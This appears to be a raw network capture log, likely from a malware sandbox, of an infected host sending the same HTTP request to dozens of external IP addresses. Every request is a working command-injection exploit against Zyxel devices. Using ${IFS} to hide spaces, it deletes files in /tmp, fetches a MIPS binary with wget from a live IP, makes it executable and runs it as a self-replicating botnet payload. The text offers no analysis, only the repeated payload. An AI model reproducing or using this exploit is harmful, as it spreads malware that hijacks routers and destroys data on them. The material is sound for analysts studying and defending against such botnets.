                              Mar 31, 2024 08:41:12.627638102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2009192.168.2.135635881.122.209.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627680063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2010192.168.2.13461824.41.42.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627703905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2011192.168.2.135466819.180.241.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627760887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2012192.168.2.134668889.222.234.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627800941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2013192.168.2.1339132160.66.186.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627844095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2014192.168.2.1353368150.181.146.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627876043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2015192.168.2.1357500180.190.218.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627918005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2016192.168.2.1344046202.170.249.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627942085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2017192.168.2.1359282162.192.118.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.627976894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2018192.168.2.1339688116.220.131.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628036022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2019192.168.2.1349754202.192.186.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628074884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2020192.168.2.1347998186.145.111.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628082991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2021192.168.2.1346148101.189.13.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628123999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2022192.168.2.133648019.110.230.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628149033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2023192.168.2.133352654.182.143.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628182888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2024192.168.2.1354594159.97.167.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628228903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2025192.168.2.1359154170.52.242.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628276110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2026192.168.2.1346338126.173.168.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628318071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2027192.168.2.1359650211.54.235.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628382921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2028192.168.2.135102014.147.6.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628411055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2029192.168.2.133920673.55.83.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628451109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2030192.168.2.1340670223.38.215.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628487110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2031192.168.2.133857664.11.41.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628540039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2032192.168.2.1349472148.193.193.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628583908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2033192.168.2.1350710152.123.192.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628618002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2034192.168.2.1334606124.47.205.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628652096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2035192.168.2.13503028.74.166.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628690004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2036192.168.2.1340714133.139.75.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628721952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2037192.168.2.1348092119.92.8.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628757000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2038192.168.2.1333070116.3.59.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628817081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2039192.168.2.1354794142.93.96.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628840923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2040192.168.2.1357484202.159.98.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628870964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2041192.168.2.135902675.98.242.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628905058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2042192.168.2.135183241.68.149.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628954887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2043192.168.2.1357430114.112.31.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.628987074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2044192.168.2.13371524.204.79.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629025936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2045192.168.2.1343772190.124.62.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629039049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2046192.168.2.1348752177.140.143.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629106998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2047192.168.2.1355218209.38.33.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629136086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2048192.168.2.1335492150.79.149.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629163980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2049192.168.2.134851279.3.155.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629189014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2050192.168.2.1340282107.15.21.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629251957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2051192.168.2.133344227.235.212.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629287004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2052192.168.2.1347930160.43.128.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629317999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2053192.168.2.1356426189.103.212.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629362106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2054192.168.2.135203471.88.16.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629396915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2055192.168.2.1352438206.87.14.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629439116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2056192.168.2.134059423.68.16.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629477024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2057192.168.2.1344800129.9.82.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629518032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2058192.168.2.1351274136.215.185.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629550934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2059192.168.2.134213284.237.228.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629589081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2060192.168.2.1351694121.92.125.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629637003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2061192.168.2.133970080.246.206.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629677057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2062192.168.2.1348090122.80.34.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629710913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2063192.168.2.1348002139.163.84.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629736900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2064192.168.2.1346310119.145.238.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629776955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2065192.168.2.134203695.121.140.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629834890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2066192.168.2.1350674106.152.202.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629893064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2067192.168.2.134326073.184.147.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629935026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2068192.168.2.1353038203.255.249.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.629971981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2069192.168.2.133369460.135.248.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630023003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2070192.168.2.1352728113.159.72.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630047083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2071192.168.2.1352640168.234.37.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630079031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2072192.168.2.1360688199.249.120.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630146027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2073192.168.2.133900654.109.221.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630189896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2074192.168.2.1353884193.250.111.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630224943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2075192.168.2.135590477.59.158.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630254030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2076192.168.2.1341666216.198.186.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:12.630286932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2077192.168.2.134454450.94.151.160443
                              TimestampBytes transferredDirectionData
